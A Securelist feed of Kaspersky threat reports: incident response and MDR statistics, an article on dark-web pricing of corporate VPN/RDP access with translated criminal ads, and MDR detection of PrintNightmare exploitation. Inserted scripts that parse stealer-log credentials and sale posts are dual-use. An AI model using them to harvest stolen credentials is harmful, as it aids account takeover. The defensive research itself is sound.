Internal threats – Securelist (https://securelist.com), feed generated Tue, 16 May 2023

The nature of cyberincidents in 2022
https://securelist.com/kaspersky-incident-response-report-2022/109680/
Published Tue, 16 May 2023 08:00:57 +0000

Kaspersky offers various services to organizations that have been targeted by cyberattackers, such as incident response, digital forensics, and malware analysis. In our annual incident response report, we share information about the attacks that we investigated during the reporting period. Data provided in this report comes from our daily interactions with organizations seeking assistance with full-blown incident response or complementary expert services for their internal incident response teams.

Download the full version of the report (PDF)

Kaspersky Incident Response in various regions and industries

In 2022, 45.9% of organizations that encountered cyberincidents were in Russia and the CIS region, followed by the Middle East (22.5%), the Americas (14.3%), and Europe (13.3%).

From an industry perspective, we offered help to government (19.39%), financial (18.37%), and industrial (17.35%) organizations most frequently.

In 2022, attackers most often penetrated organizations’ infrastructure by exploiting vulnerabilities in public-facing applications (42.9%). Compared to 2021, however, the share of this initial access vector fell by 10.7 percentage points, while the share of attacks that started with compromised accounts (23.8%) grew. The share of malicious e-mail among initial access vectors continued to decline and stood at 11.9% in 2022.

In 39.8% of cases, the reported incidents were related to ransomware attacks. Encrypted data remains the number-one problem our customers face. Compared to 2021, however, the number of ransomware-related incidents dropped, and not every attack involving file encryption was aimed at extracting a ransom: in some of these incidents, ransomware was used to destroy the initial traces of the attack and complicate the investigation.

Expert recommendations

To protect your organization against cyberattacks, Kaspersky experts recommend the following:

  • Implement a robust password policy and enforce multifactor authentication
  • Remove management ports from public access
  • Establish a zero-tolerance policy for patching public-facing applications, or apply compensating controls where patching is not possible
  • Make sure that your employees maintain a high level of security awareness
  • Use a security toolstack with EDR-like telemetry
  • Implement rules for detection of pervasive tools used by adversaries
  • Continuously train your incident response and security operations teams to maintain their expertise and stay up to speed with the changing threat landscape
  • Back up your data on a regular basis
  • Work with an Incident Response Retainer partner to address incidents with fast SLAs

To learn more about incident response in 2022, including a MITRE ATT&CK tactics and techniques heatmap, and distribution of various incidents by region and industry, download the full version of the report (PDF).

For a deeper analysis of the vulnerabilities most commonly exploited by cyberattackers, download this appendix (PDF).

Managed Detection and Response in 2022
https://securelist.com/mdr-report-2022/109599/
Published Tue, 02 May 2023 08:00:15 +0000

Kaspersky Managed Detection and Response (MDR) is a service for 24/7 monitoring of and response to detected incidents, based on the technologies and expertise of the Kaspersky Security Operations Center (SOC) team. MDR detects threats at any stage of an attack – both before anything is compromised and after the attackers have penetrated the company’s infrastructure. This is achieved through preventive security systems and active threat hunting, the essential MDR components. MDR also features automatic and manual incident response and expert recommendations.

The annual Kaspersky Managed Detection and Response analytical report sums up the analysis of incidents detected by Kaspersky SOC team. The report presents information on the most common offensive tactics and techniques, the nature and causes of incidents and gives a breakdown by country and industry.

2022 incidents statistics

Security events

In 2022, Kaspersky MDR processed over 433,000 security events. 33% of those (over 141,000 events) were processed using machine learning technologies, and 67% (over 292,000) were analyzed manually by SOC analysts.

Over 33,000 security events were linked to 12,000 real incidents. Overall, 8.13% of detected incidents were of high, 71.82% of medium, and 20.05% of low severity.

Response efficiency

72% of 2022 incidents were detected based on a single security event, after which the attack was stopped right away. Of these, 4% were of high, 74% of medium, and 22% of low severity.

On average, in 2022, a high-severity incident took the SOC team 43.8 minutes to detect. The 2022 figures for medium- and low-severity incidents are 30.9 and 34.2 minutes, respectively.

Geographical distribution, breakdown by industry

In 2022, 44% of incidents were detected in European organizations. Russia and CIS are in second place with a quarter of all detected incidents. Another 15% of incidents relate to organizations from the Asia-Pacific.

Industry-wise, industrial organizations suffered more incidents than any other sector. Most of the critical incidents were detected in government agencies and in industrial and financial organizations. It is worth noting, though, that a fair share of the critical incidents in financial organizations were due to Red Teaming exercises rather than real attacks.

Recommendations

For effective protection from cyberattacks, these are Kaspersky SOC team’s recommendations to organizations:

  • Apart from the classic monitoring instruments, deploy active threat hunting methods and tools that allow for early detection of incidents.
  • Hold regular cyberdrills involving Red Teaming to train your teams to detect attacks and to assess the organization’s security.
  • Adopt a multilevel malware protection approach that combines various threat detection technologies, from signature analysis to machine learning.
  • Use the MITRE ATT&CK knowledge base.

See the full version of the report (PDF) for more information on the incidents detected in 2022, the main offensive tactics and techniques, the MITRE ATT&CK classification of incidents, and detection methods.

How much does access to corporate infrastructure cost?
https://securelist.com/initial-access-data-price-on-the-dark-web/106740/
Published Wed, 15 Jun 2022 10:00:29 +0000

Division of labor

Money has been and remains the main motivator for cybercriminals. The most widespread techniques of monetizing cyberattacks include selling stolen databases, extortion (using ransomware) and carding. However, there is demand on the dark web not only for data obtained through an attack, but also for the data and services necessary to organize one (e.g., to perform specific steps of a multiphase attack). Complex attacks almost invariably feature several phases, such as reconnaissance, initial access to the infrastructure, gaining access to target systems and/or privileges, and the actual malicious acts (data theft, destruction or encryption, etc.). This is just one example of a phased attack where each step can be accomplished by a new contractor – if only because the different steps require different expertise.

Experienced cybercriminals seek to ensure the continuity of their business and constantly need new data for initial access to corporate systems. It’s advantageous for them to pay for prearranged access rather than spend time digging for primary vulnerabilities and penetrating the perimeter.

Request for access to corporate VPN. Source: Kaspersky Digital Footprint Intelligence service portal

Screenshot translation

Post
I will buy accounts for access to corporate VPNs or firewalls (FortiGate, SonicWall, PulseSecure, etc.) or take them for further attack development.
I have a small team.
Revenue from 150kk and higher.
Countries: US, CA, AU, GB
Suggest your price in pm, everything is negotiable
Price: 1000 USD
Send offers to private messages

In contrast, less experienced cybercriminals are not always able to see an attack through to the end (malware execution, data theft, etc.), but are proficient enough to make money by selling initial access. This article deals specifically with this initial access market.

Types of initial access

These are the most common actions used by cybercriminals to obtain initial access to corporate infrastructure in order to develop an attack:

  • Exploitation of software vulnerabilities. For example, attacks on a corporate web resource (exploitation of 1-day vulnerabilities in website components, SQL injection, gaining access to vulnerable web app control panels, etc.).
  • Obtaining legitimate corporate credentials. For example, using data from stealer logs or password guessing.
  • Phishing attacks on employees. For example, an e-mail with a malicious payload.

You can learn more about these types of attacks and the specifics of gaining initial access from our analysis report based on data from hundreds of incident investigations.

A special mention should be made of the method of capturing legitimate accounts with stealers. These malicious programs run on infected devices and collect account and payment data, cookie files, authorization tokens, etc., which they save to their logs. Cybercriminals scan these logs for data they can exploit and monetize: some look for credit card data, others for domain accounts, social network accounts and so on. They refer to this stage as processing. After sorting the logs, they either share their finds on forums by making them public or sell them to individual buyers.
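A defender-side view of that same processing step, as an added example that is not part of the original article or of any Kaspersky tool: a small Python triage script that takes a processed stealer log in the common url:login:password layout (plus Netscape-format cookie rows), pulls out the entries that touch a corporate domain, flags the ones that point at remote-access portals such as VPN, OWA or SSO, and notes passwords reused across corporate hosts. The log lines, the domain example-corp.com and the portal keyword list are constructed for the example; real stealer families use varying layouts, so the parser is deliberately tolerant.

```python
"""Triage of a processed stealer log for corporate exposure.

Added example (not from the Securelist article or any Kaspersky tool).
Assumptions: credential lines are "url:login:password", cookies are Netscape
rows with seven tab-separated fields; domains and sample data are constructed.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: what a "mail:pass" extract of a stealer log looks like.
SAMPLE_LOG = """\
https://vpn.example-corp.com/remote/login:jdoe@example-corp.com:Summer2021!
https://mail.example-corp.com/owa/:asmith@example-corp.com:P@ssw0rd
https://www.facebook.com/login:jdoe@gmail.com:hunter2
https://portal.partner-bank.example/auth:ops@partner-bank.example:Welcome1
sso.example-corp.com:jdoe@example-corp.com:Summer2021!
# cookie jar dumped by the same stealer (Netscape format)
.example-corp.com\tTRUE\t/\tTRUE\t1700000000\tSESSION\tabc123
"""

# Domains the defender owns (constructed).
CORPORATE_DOMAINS = {"example-corp.com"}

# URL fragments that mark remote-access and single-sign-on portals, the kind
# of access the article shows being traded most often (assumed list).
REMOTE_ACCESS_MARKERS = ("vpn", "remote", "rdweb", "sso", "owa", "citrix")

# url:login:password; the login may not contain ':' or '/', which lets the
# non-greedy url group run past the "https:" scheme colon.
CRED_LINE = re.compile(r"^(?P<url>.+?):(?P<user>[^:/\s]+):(?P<password>.+)$")


def belongs_to(host, domains):
    """True if host equals or is a subdomain of one of the given domains."""
    return any(host == d or host.endswith("." + d) for d in domains)


def parse_credentials(text):
    """One record per credential line; comments and cookie rows are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "\t" in line:
            continue
        m = CRED_LINE.match(line)
        if not m:
            continue
        url = m["url"]
        # urlsplit only finds a hostname in an absolute or scheme-relative URL
        host = urlsplit(url if "://" in url else "//" + url).hostname or ""
        records.append({"url": url.lower(), "host": host.lower(),
                        "user": m["user"].lower(), "password": m["password"]})
    return records


def parse_cookies(text):
    """Netscape cookie rows -> list of (domain, cookie_name)."""
    rows = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) == 7:
            rows.append((parts[0].lstrip(".").lower(), parts[5]))
    return rows


def triage(text, domains=CORPORATE_DOMAINS):
    """Pick out what in the dump concerns the defender's own domains."""
    corporate = []
    for rec in parse_credentials(text):
        user_domain = rec["user"].rsplit("@", 1)[-1] if "@" in rec["user"] else ""
        if belongs_to(rec["host"], domains) or belongs_to(user_domain, domains):
            rec["remote_access"] = any(k in rec["url"] for k in REMOTE_ACCESS_MARKERS)
            corporate.append(rec)
    reused = {}  # (user, password) -> corporate hosts it was captured for
    for rec in corporate:
        reused.setdefault((rec["user"], rec["password"]), set()).add(rec["host"])
    return {
        "total_records": len(parse_credentials(text)),
        "corporate_records": corporate,
        "exposed_users": sorted({r["user"] for r in corporate}),
        "remote_access_hits": [r for r in corporate if r["remote_access"]],
        "password_reuse": sorted(u for (u, _), hosts in reused.items() if len(hosts) > 1),
        "corporate_cookies": [c for c in parse_cookies(text) if belongs_to(c[0], domains)],
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print(f"{result['total_records']} records, "
          f"{len(result['corporate_records'])} touch corporate domains")
    for rec in result["remote_access_hits"]:
        print("remote-access portal credential:", rec["user"], "->", rec["host"])
    print("password reuse across corporate hosts:", result["password_reuse"])
    print("corporate session cookies:", result["corporate_cookies"])
```

The output is what a defender needs first: which identities must be reset, which of them unlock a VPN or mail portal from the outside, and whether a live session cookie for a corporate domain is in the dump, since a stolen cookie or token bypasses the password reset entirely and the session has to be revoked on the server side.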

Malware log offers on a dark web forum. Source: Digital Footprint Intelligence service

Screenshot translation

[2TB of logs] I will retrieve data from my databases on your requests
Message
I have my own databases. I can retrieve data you need from my databases.
Suggest your price.
2TB of 2020-2021 data: credentials related to banking accounts and the most popular services. Profit will only be obtained from private service accounts.

Free malware log offers on a dark web forum. Source: Digital Footprint Intelligence service

Screenshot translation

Malware logs (different). General topic.
Post
I publish log data of Azor ransomware for free, it could be useful for someone.
Logs contain mixed data from infected devices worldwide.

The cybercriminals are literally dealing in gigabytes of logs generated by stealers.

Large volume of logs uploaded to a file exchange service

Topic on dark web forum with a request for specific malware logs

Screenshot translation

Verified! I will buy information retrieved from your log data (USA) based on my request [MAIL:PASS only required]
Good day!
I will buy information retrieved from your log data (with USA-related data extracted) based on my request.
I buy at least 150 lines, thus, I will not pay if you will send me less lines.
Warning! I buy only user credentials (MAIL:PASS) data from your logs, which match my requirements, I do not need the whole logs
If you do not know how to extract mail:pass data from logs, you can use StealerLogSearcher v1.3
My request:

  • I have Brute/Checker [it does not work fast]
  • I pay only for valid credentials + credit cards data (no matter if credit card is active or not)
  • Your own log data is the priority, I already have 95% of public logs
  • Price is 0.5 USD for valid user account with linked card
  • NO payment for already used accounts (I can see it by log data) | If more than 80% of accounts in the database have already been used, I will NOT PAY FOR PROVIDED LINES AT ALL.
  • I normalize the provided database, remove duplicates and compare with my anti-public database before processing your data via brute/checker
  • I work with everybody on a first-come, first-served basis, if my software is already processing someone’s database – wait
  • I only work with a guarantee or first logs, then payment. Doesn’t matter who you are.
  • I won’t work with you if you act crazy, hurry me, talk rude, cadge, etc.

Topic on dark web forum with a request for specific malware logs

Screenshot translation

Hi everybody! I am looking for checked (verified) mixed Facebook logs.
The catalog with log data should contain Facebook EAAB (access) token and cookie file, an example is attached.
I need valid logs.
Initially, required value of data is 100-200 samples per week.
Contact me via private messages or Telegram. Thank you for your attention!

Main criteria for initial access valuation

Cybercriminals use a set of criteria when describing which company they sell access to on dark web forums: company size, revenue, business area, region and so forth. Yet, from analyzing a lot of posts you could conclude that corporate revenue is the main criterion: almost all posts mention revenue, whereas the region and business area of the target company are advertised much less. Some posts also refer to the level of complexity as a reason for high prices, i.e., how much time and effort the seller spent to gain access. But this is quite a subjective criterion that depends, among other things, on the cybercriminal’s expertise.

Announcements on a dark web forum offering VPN/RDP network access to different organizations

Screenshot translation

I sell VPN accounts of USA companies, revenue is 1kkk$
Post
Company is a global organization that provides technologies and services for customers and specializes in design and implementation
Employees: more than 50 000
Revenue: $1 billion
USA
Price: 7 000$
Access type: VPN
Company is a leading provider of web presence solutions for small and mid-sized businesses worldwide.
Employees: 2k+
Revenue: 700kk$
USA
Price: 5 000$
Access type: VPN
We work with guarantees; otherwise, you pay a deposit and I will provide you with access information in advance.
First contact in private messages.

Announcements on a dark web forum offering VPN/RDP network access to different organizations

Screenshot translation

[Sale] VPN-RDP accounts for network access
Post
Company is a law firm providing legal support services to clients, assistance in business projects start-up and pre-trial proceedings.
Country: France
Access type: VPN-RDP
Revenue: 8kk+$ (information is current as of 2019)
Access level: Admin
Price: 300$
Company is a private healthcare organization with its own laboratory. It provides wide-ranging medical services.
Country: USA
Access type: VPN-RDP
Revenue: 3kk+$
Access level: Admin
Price: 300$
Company provides a wide range of construction services, including door/window installation. It also has its own production facility.
Country: United Kingdom
Access type: VPN-RDP
Revenue: 2kk+$
Access level: Admin
Price: 200$
Company produces branded clothes.
Country: USA
Access type: VPN-RDP
Revenue: 6kk+$

In addition to the target company’s features, the price can also depend on the type of access offered. Information about a vulnerability (e.g., an SQL injection) and legitimate credentials (e.g., for RDP/SSH) will be priced very differently for companies with comparable revenues, because they offer different probabilities of a successful attack. Selling an account for a remote management interface (RDP, SSH) means that access to a system inside the corporate network has already been gained, whereas a vulnerability merely offers the chance to achieve a similar level of access. Even for the same issue, such as an SQL injection, many factors affect the potential development of the attack and therefore its cost: where the vulnerable host is located (corporate network or cloud server), which DBMS is used, the intended exploitation technique, the database volume, etc.

Cost of initial access

To find out how these criteria influence the cost of access, we analyzed about 200 posts published on two popular dark web forums. We identified a set of relevant parameters for each one:

  • Corporate revenue
  • Type of access
  • Price of data
  • Company info (region, business area, etc.)

We then screened out the irrelevant posts – those not stating the revenue or the price of the network access data. This reduced the total to 117 posts.

The following diagram shows the correlation between lot price and revenue without considering the technical factors:

The correlation between the price of network access data and a company’s revenue

As you can see:

  • Most offers fall within the $0–$5,000 price range
  • Most offers refer to moderately sized companies
  • Average price of access data (depicted as a trend line) is between several hundred and five thousand dollars, and grows as revenue increases

Some of the major deviations from this price range can be explained by lot characteristics, such as the specifics of the business area. For instance, network access data for a company specializing in POS terminals and providing online payment acquiring services was valued much higher ($20,000) than other similar offers. The price may also be raised by “bonuses” attached to the lot, such as an already compromised database containing e-mail addresses or other sensitive or confidential data sold in the same package as the access. The buyer can either process these later or use and resell them separately.

If we take a closer look at the price distribution across the whole body of offers, almost half of them (42.74%) are under $1,000.

Offers grouped by price category

If analyzed in terms of access type, most posts offer RDP access or a VPN + RDP bundle (75.21% of lots). In the diagram below both of these options belong to the categories “RDP access (without details)”, “RDP access (local admin)”, “RDP access (domain admin)” and “RDP access (user)”.

Offers grouped by access type
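Turning a pile of forum posts into the parameters listed above is mostly a parsing problem, because sellers write revenue and price in the shorthand seen in the screenshots (1kkk$, 700kk$, 8kk+$, 7 000$, $50k, 12 BTC). The following Python script is an added example, not the code behind the article’s analysis: it extracts revenue, price and access type from posts of that shape, screens out posts that lack a revenue or a price as the article did, and groups the rest by price bracket and access type. The posts are constructed for the example, modelled on the translated lots above; the bracket boundaries ($1,000 and $5,000) follow the figures the article reports.

```python
"""Extract revenue, price and access type from initial-access sale posts.

Added example, not the code behind the article's analysis. The posts below
are constructed, modelled on the translated lots in the article; the money
shorthand (k = thousand, kk = million, kkk = billion) is the one sellers use.
"""
import re
from collections import Counter

MULTIPLIERS = {
    "kkk": 10**9, "billion": 10**9, "bn": 10**9,
    "kk": 10**6, "million": 10**6, "mn": 10**6, "m": 10**6,
    "k": 10**3,
}
# number with optional separators/decimals, then an optional unit; longest
# units first, and \b stops "m" from matching the start of a following word
MONEY = re.compile(r"(\d[\d\s,]*(?:\.\d+)?)\s*(kkk|kk|k|billion|bn|million|mn|m)?\b")

POSTS = [  # constructed lots
    "I sell VPN accounts of USA companies, revenue is 1kkk$\n"
    "Employees: more than 50 000\nRevenue: $1 billion\nCountry: USA\n"
    "Price: 7 000$\nAccess type: VPN",
    "Company is a law firm.\nCountry: France\nAccess type: VPN-RDP\n"
    "Revenue: 8kk+$ (information is current as of 2019)\n"
    "Access level: Admin\nPrice: 300$",
    "Private healthcare organization.\nCountry: USA\nAccess type: VPN-RDP\n"
    "Revenue: 3kk+$\nAccess level: Admin\nPrice: 300$",
    "Country: Australia\nRevenue: > $500 million+\n"
    "Admin-level access, direct connection to SSH servers, access to backups.\n"
    "Price: 12 BTC",
    "Company produces branded clothes.\nCountry: USA\nAccess type: VPN-RDP\n"
    "Revenue: 6kk+$",                       # no price stated: screened out
    "Country: Australia\nAccess type: VPN-RDP\nRevenue: 465 million\n"
    "Access level: Domain Admin\nPrice: $50k",
]


def parse_money(text):
    """'8kk+$' -> (8000000, 'USD'); '12 BTC' -> (12, 'BTC'); None if no number."""
    s = text.lower()
    currency = "BTC" if "btc" in s else "USD"
    for junk in ("usd", "btc", "$", ">", "+"):
        s = s.replace(junk, "")
    m = MONEY.search(s)
    if not m:
        return None
    number = float(re.sub(r"[\s,]", "", m.group(1)))
    value = number * MULTIPLIERS.get(m.group(2) or "", 1)
    return (int(value) if value.is_integer() else value, currency)


def fields_of(post):
    """'Key: value' lines -> dict with lower-case keys."""
    out = {}
    for line in post.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            out[key.strip().lower()] = value.strip()
    return out


def detect_access(fields, post):
    """Use the 'Access type' field if present, else scan the whole post."""
    hay = (fields.get("access type") or post).lower()
    found = {k for k in ("vpn", "rdp", "ssh") if k in hay}
    if {"vpn", "rdp"} <= found:
        return "VPN+RDP"
    for k in ("rdp", "vpn", "ssh"):
        if k in found:
            return k.upper()
    return "unknown"


def parse_post(post):
    f = fields_of(post)
    revenue = parse_money(f["revenue"]) if "revenue" in f else None
    price = parse_money(f["price"]) if "price" in f else None
    return {
        "revenue_usd": revenue[0] if revenue and revenue[1] == "USD" else None,
        "price": price,
        "access": detect_access(f, post),
        "country": f.get("country"),
        "level": f.get("access level"),
    }


def price_bucket(usd):
    if usd < 1_000:
        return "under $1,000"
    if usd <= 5_000:
        return "$1,000-$5,000"
    return "over $5,000"


def summarize(posts):
    """Screen out lots without revenue or price, then group what is left."""
    parsed = [parse_post(p) for p in posts]
    eligible = [p for p in parsed if p["revenue_usd"] and p["price"]]
    usd_prices = [p["price"][0] for p in eligible if p["price"][1] == "USD"]
    buckets = Counter(price_bucket(v) for v in usd_prices)
    return {
        "screened": len(parsed),
        "eligible": len(eligible),
        "usd_price_buckets": buckets,
        "share_under_1000": buckets["under $1,000"] / len(usd_prices) if usd_prices else 0.0,
        "access_types": Counter(p["access"] for p in eligible),
        "lots": eligible,
    }


if __name__ == "__main__":
    s = summarize(POSTS)
    print(f"{s['eligible']} of {s['screened']} posts state both revenue and price")
    print("price brackets (USD lots):", dict(s["usd_price_buckets"]))
    print(f"share under $1,000: {s['share_under_1000']:.0%}")
    print("access types:", dict(s["access_types"]))
```

Lots priced in BTC are kept for the access-type breakdown but left out of the dollar brackets rather than converted, because the exchange rate on the posting date is usually unknown; the same choice keeps the price-versus-revenue comparison honest.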

To get a clearer picture of the connection between lot price and corporate revenue, we analyzed the posts offering data for RDP access – the most common access category and most uniform pricewise – for large businesses with revenue of over $500 million. The following diagram shows how revenue affects the cost of data for RDP access.

The correlation between RDP access cost and large company revenue

This diagram doesn’t demonstrate a direct correlation between access cost and corporate income. However, the selection is quite small, meaning the disproportionate influence of variable access properties (user privileges, a company’s country/region/industry) could skew any remotely objective conclusions based on quantitative analysis.

One way or another, access to large business infrastructure usually costs between $2,000 and $4,000, which are relatively modest prices. But there is no upper limit to the cost either. For example, in the topic below the original lot price was $50,000 (the lot also covered a number of sub-companies). And even though the price was later halved by the seller, one of the thread members called the offer overpriced.

Sale of data for remote access to five companies in one network for $50,000

Screenshot translation

Hi, I offer VPN-RDP access
There is access data to 2-3 domains of that network, the total number is 3-4, I don’t know exactly, see the screenshot below for DNS servers!
Country: Australia
The company sells goods, not foodstuffs etc., but garments etc.! more in pm!
Revenues differ, 465 million for the main company only, and there is access to their networks, there is also an account with their domain, I could not get access to the domain itself so far! but if you try you can gain access to all domains in their different networks!
Respond only if ready to buy, preferably with a big deposit
Price: $50k not much for several companies with resources on one network. There are lots of RDP interfaces, RDP is closed on some servers, but it can still be opened easily using PSexec or using your own method!
not in a hurry to sell. every network has its own network access servers, I think some of them were accessible, there is lots of data for processing with a good chance of a successful outcome! The country is not poor, so if an attack is conducted well, the payoff will be substantial!
Updating my post, I have taken 4 Domain Admins, let me make it clear for the dumb ones out there, 4 Domain Admins means different accounts for different ADs. for example, there is a network XXXX with several AD services each with user accounts of its own, there is also another XXXX network also with several ADs and accounts of its own, well, I have access to each AD from the different networks, you will be able to compromise networks of 4-5 different companies in one go, all these companies belong to 1 head company, and four subsidiaries are on the same VPN network, and they are all interconnected, each network has an internet adapter of its own, as I said before, respond only if ready to buy, preferably with a big deposit!

Price reduced from $50,000 to $25,000

Screenshot translation

If you buy today I will cut the price down to $25K
Warning from moderator: work strictly through guarantee

Comment about the offer being overpriced

Screenshot translation

You seem to have no clue what access is and what its price is, nobody will buy it even for 3K, 95% probability

Response to comment about the offer being overpriced

Screenshot translation

Your message is funny, I saw people selling access for $100K, I saw people getting many times more than they had paid, this is what buying access is all about, if you buy access for ransomware and process it properly, and if you get paid around $200K which is nothing for companies like that, you get huge profit, I’m not mentioning people charging $1mn and more, if you are not happy about something keep your comments to yourself, do not litter the thread!

Discussion continuation. Source: Digital Footprint Intelligence service

Screenshot translation

2 minutes ago Eastfarmer said:
I can’t stop laughing, don’t you mind the disgrace, what is it I don’t know about ransomware? are you the person who enters, checks nothing and encrypts the first random machines? $1k? go ahead and tell me why it should cost $1k. is it just one company with 20 computers and revenue of 10 mn? don’t be stupid man. I am telling you again there are 5 companies, they are all subsidiaries of a head company, a subsidiary has $465mn revenue, others a bit less. Australians?)))))) you mean Australians are poor? do they have a poor economy? man, people pay huge money even for African companies. What are you trying to tell me, a friend of mine pocketed $200k from a company with $15mn revenue. It was Estonia, or maybe you are a friend and supporter of the first two dudes or just a windbag? I really don’t get it what are you trying to make of it, if they don’t buy it so be it, why this pointless flood? can’t you just pass it by? mind your own business
I didn’t say a word about you being a poor pentester. I said you are poor ransomwarer at least because you have not conducted the attack yourself)) do you understand the difference, nobody insulted you as a specialist, if you took offence I am sorry. I will not write to your thread any more

Here is another example of a high price being asked for data belonging to a company with a revenue of $500 million. The asking price is 12 BTC.

Lot price 12 BTC

Screenshot translation

Australia
Revenue: > $500 million+
There is access to a network, admin-level access, direct connection to SSH servers, access to backups.
Price: 12 BTC
All questions in pm

Interestingly, access to corporate networks is in high demand, with some lots selling on the same day they are published.

Access data sold on the day of publication

Access data sold a few days after publication

Ransomware auctions: stolen data pricing

Undoubtedly, one of the most important components of the initial access price is the amount of money the buyer can potentially earn from an attack conducted using that access. Cybercriminals are ready to pay thousands or even tens of thousands of dollars for the opportunity to infiltrate a corporate network for a reason. Successful attacks pay off very nicely. Ransomware attacks are a prime example. In attacks like that malware usually encrypts a significant amount of data on workstations or servers, virtually paralyzing the company’s operations or causing material risks to its business processes. Once encryption is accomplished, the attackers contact the victim with an offer to buy decryption keys. These often cost millions of dollars. For example, according to media reports, a European travel agency dished out $4.5 million, and a large American insurer a whopping $40 million in ransom money.

Of late, cybercriminals have tended not only to encrypt but also to steal corporate data. They may later post some of the stolen data on their blogs – primarily as proof, but also as extra leverage – threatening to publish more unless the company pays the demanded sum within the stipulated timeframe.

Different ransomware groups follow different approaches to publishing stolen data.

  • Some of them publish information about the incident (along with the data) only if no agreement is reached with the victim.
  • Some publicize the incident immediately after the attack and state exactly when they plan to begin disclosing critical data.
  • Some set up an auction in which the stolen data will go to whoever is willing to pay the highest price (presumably a single buyer). In this latter case, the auction price of a lot – though smaller than the ransom charged for data decryption – can still be several times more than the price of access to the corporate system.

If we take a look at posts offering stolen data to a single buyer, the lot price normally starts in the tens of thousands of dollars, often reaching sums of around a million.

Blackmailer blog: auction price of stolen data

Blackmailer blog: auction price of stolen data along with published data

Blackmailer blog: auction closed (stolen data sold to a single buyer)

Blackmailer blog: active auction

Blackmailer blog: stolen data published in parts (one part at a time)

Blackmailer blog: data on Charlie Hebdo terrorist attack stolen from a legal firm are available for $1 million

Blackmailer blog: attackers announce the publication of stolen data after they failed to negotiate with the victim company

Blackmailer blog: attackers announce they are waiting for the ransom (1 day and 11 hours left before the publication of stolen data)

Blackmailer blog: the attackers published the stolen data because the ransom was not paid

Conclusion

Demand for corporate data on the black market is high, and it doesn’t always involve targeted attacks. Attackers may gain access to the infrastructure of a random company to sell it to blackmailers or other advanced cybercriminals later. An attack like that can affect a company of any size, big or small, because corporate system access is often priced moderately on underground forums, especially compared to the potential damage to a business.

Sellers on the dark web most often offer remote access via RDP. To protect corporate infrastructure from attacks through remote access and control services, make sure the connection via this protocol is secure by:

 

[1] For details of the service and test access, please contact us at intelligence@kaspersky.com

Managed detection and response in 2021
https://securelist.com/managed-detection-and-response-in-2021/106540/
Published Thu, 26 May 2022 11:00:55 +0000

Kaspersky Managed Detection and Response (MDR) helps organizations to complement existing detection capabilities or to expand limited in-house resources to protect their infrastructure from the growing number and complexity of threats in real time. We collect telemetry from clients’ networks and analyze it using machine learning and artificial intelligence, plus human threat-hunting analysts. Kaspersky SOC investigates alerts and notifies the client if there is something bad going on, providing response actions and recommendations.

MDR in 2021 in numbers

In 2021:

  • Kaspersky MDR received 414K alerts.
  • 63.74% of received alerts were processed by SOC analysts, 6.67% of which were related to real incidents reported to customers via the MDR portal
  • 77.4% of all incidents were related to only one alert
  • 14% of incidents were high-severity, 66% medium-severity, and 20% low-severity
  • The average identification time of high-severity incidents was 41.4 minutes
  • 40.7% of high-severity incidents were targeted attacks; 18% were ethical offensive exercises (penetration testing, red teaming etc.)
  • Most incidents were detected at the initial access (27.3%) and lateral movement (16.3%) stages
  • Most often high-severity incidents were detected in IT (39%), industrial (30.2%), and financial (29.1%) organizations
  • The LOLBins (living-off-the-land binaries) most often used by attackers were cmd.exe, powershell.exe, and rundll32.exe

Download the full Kaspersky Managed Detection and Response 2021 report.

Kaspersky Managed Detection and Response: interesting cases https://securelist.com/kaspersky-managed-detection-and-response-interesting-cases/105214/ Wed, 15 Dec 2021 10:00:42 +0000

Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass automatic security barriers. Its capabilities are backed by a highly professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts, who complement the automatic detection logic and let us continuously improve the detection rules.

The MDR results allow us to map out the modern threat landscape and show techniques used by attackers right now. We share these results with you so that you are more informed about in-the-wild attacks and better prepared to respond.

PrintNightmare vulnerability exploitation

This summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: CVE-2021-1675/CVE-2021-34527, also known as PrintNightmare. The vulnerability was published in June 2021 and allows an attacker to make the spooler service load an arbitrary DLL as a printer driver, and thus to execute code remotely on a vulnerable host with System privileges. We have already published the technical details of this vulnerability; today we will talk about how MDR analysts detected and investigated attacks exploiting it in real companies.

Case #1

Shortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was taken down several hours later, but during this time several other users managed to clone it.

Kaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed the spooler service accessing suspicious DLL libraries; notably, the file names used by the attacker were exactly the same as those in the public exploit on GitHub.

Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host:
C:\Windows\System32\spool\drivers\x64\3\nightmare.dll
C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll
In addition, the following script was found on the host:
\cve-2021-1675-main-powershell\cve-2021-1675-main\cve-2021-1675.ps1

The table below contains signs of suspicious activity that served as a starting point for the investigation.

MITRE ATT&CK technique: T1210 Exploitation of Remote Services
  MDR telemetry event type: Local File Modification
  Detection details:
    Modified file path: C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll
    File modifier: C:\Windows\System32\spoolsv.exe
    Parent of the modifier: C:\Windows\System32\services.exe
  Description: Legitimate spoolsv.exe locally modified c:\windows\system32\spool\drivers\x64\3\old\1\nightmare.dll

MITRE ATT&CK technique: T1588.005 Obtain Capabilities: Exploits
  MDR telemetry event type: AV exact detect in OnAccess mode
  Detection details:
    File: \cve-2021-1675-main-powershell\cve-2021-1675-main\cve-2021-1675.ps1
    AV verdicts: Exploit.Win64.CVE-2021-1675.c; UDS:Exploit.Win64.CVE-2021-1675.c
  Description: CVE-2021-1675 exploit was detected and successfully deleted by the AM engine

Case #2

In another case, MDR analysts discovered a different attack scenario related to the exploitation of the PrintNightmare vulnerability. In particular, spooler service access to suspicious DLL files was observed. In addition, the spooler service executed some unusual commands and established a network connection. Based on the tools used by attackers, we presume that this activity was related to penetration testing.

MDR analysts detected the creation of suspicious DLL libraries on a monitored host using the certutil.exe tool (decoding a text file into a PE binary). After that, a scheduled task that starts the spooler service was created, and the spooler service loaded the newly created DLLs:
C:\Windows\System32\spool\drivers\x64\3\new\hello.dll
C:\Windows\System32\spool\drivers\x64\3\new\unidrv.dll…
